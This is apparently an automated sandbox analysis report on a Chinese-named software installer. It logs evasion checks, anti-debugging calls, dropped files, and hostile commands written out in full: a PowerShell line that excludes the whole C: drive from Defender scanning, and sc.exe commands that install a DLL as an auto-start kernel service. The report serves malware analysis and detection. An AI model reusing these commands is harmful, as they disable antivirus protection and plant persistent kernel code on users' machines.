Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5942Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3853Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpWindow / User API: threadDelayed 526Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpWindow / User API: threadDelayed 503Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpWindow / User API: threadDelayed 506Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\is-0C2B4.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\trash (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SND3J.tmp\update.vacJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-C426E.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-C426E.tmp\update.vacJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SND3J.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\updat4.vacJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeAPI coverage: 7.4 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2284Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA098B0 FindFirstFileA,FindClose,FindClose,6_2_6CA098B0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00186868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,9_2_00186868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00187496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,9_2_00187496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_00189C60 GetSystemInfo,9_2_00189C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000002.1865902487.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6C893886 NtSetInformationThread 00000000,00000011,00000000,000000006_2_6C893886
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA1EFA1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6CA1EFA1
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 9_2_002057D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,9_2_002057D0
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA1DF9D mov eax, dword ptr fs:[00000030h]6_2_6CA1DF9D
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA28B86 mov eax, dword ptr fs:[00000030h]6_2_6CA28B86
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA28B55 mov eax, dword ptr fs:[00000030h]6_2_6CA28B55
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA1EFA1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6CA1EFA1
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpCode function: 6_2_6CA17ADD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6CA17ADD

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Source: tProtect.dll.12.drStatic PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-GK8PB.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe "C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6VGJG.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
